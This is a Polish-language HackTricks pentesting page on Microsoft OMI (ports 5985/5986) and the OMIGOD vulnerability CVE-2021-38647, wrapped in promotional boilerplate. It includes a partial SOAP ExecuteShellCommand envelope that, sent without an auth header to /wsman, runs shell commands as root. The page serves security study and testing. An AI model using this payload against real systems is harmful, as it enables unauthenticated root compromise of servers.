hacktricks/network-services-pentesting/5985-5986-pentesting-omi.md

5985,5986 - Testowanie penetracyjne OMI

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

• Pracujesz w firmie zajmującej się cyberbezpieczeństwem? Chcesz zobaczyć swoją firmę reklamowaną w HackTricks? A może chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź PLAN SUBSKRYPCYJNY!
• Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
• Zdobądź oficjalne gadżety PEASS & HackTricks
• Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź mnie na Twitterze 🐦@carlospolopm.
• Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium hacktricks i hacktricks-cloud.

Podstawowe informacje

OMI jest prezentowane jako narzędzie open-source stworzone przez Microsoft, przeznaczone do zdalnego zarządzania konfiguracją. Jest szczególnie istotne dla serwerów Linux w chmurze Azure, które korzystają z usług takich jak:

• Azure Automation
• Azure Automatic Update
• Azure Operations Management Suite
• Azure Log Analytics
• Azure Configuration Management
• Azure Diagnostics

Proces omiengine jest uruchamiany i nasłuchuje na wszystkich interfejsach jako root, gdy te usługi są aktywowane.

Domyślne porty używane to 5985 (http) i 5986 (https).

CVE-2021-38647 Podatność

Jak zaobserwowano 16 września, serwery Linux w chmurze Azure z wymienionymi usługami są podatne ze względu na podatną wersję OMI. Podatność ta polega na nieprawidłowym autoryzowaniu klienta przez serwer OMI przy obsłudze wiadomości przez punkt końcowy /wsman bez wymagania nagłówka uwierzytelniającego.

Atakujący może wykorzystać to, wysyłając ładunek SOAP "ExecuteShellCommand" bez nagłówka uwierzytelniającego, zmuszając serwer do wykonywania poleceń z uprawnieniami roota.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Aby uzyskać więcej informacji na temat tej CVE sprawdź to.

Odwołania

• https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
• https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

• Czy pracujesz w firmie zajmującej się cyberbezpieczeństwem? Chcesz zobaczyć swoją firmę reklamowaną w HackTricks? A może chcesz mieć dostęp do najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF? Sprawdź PLAN SUBSKRYPCJI!
• Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
• Zdobądź oficjalne gadżety PEASS & HackTricks
• Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź mnie na Twitterze 🐦@carlospolopm.
• Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do repozytorium hacktricks i hacktricks-cloud.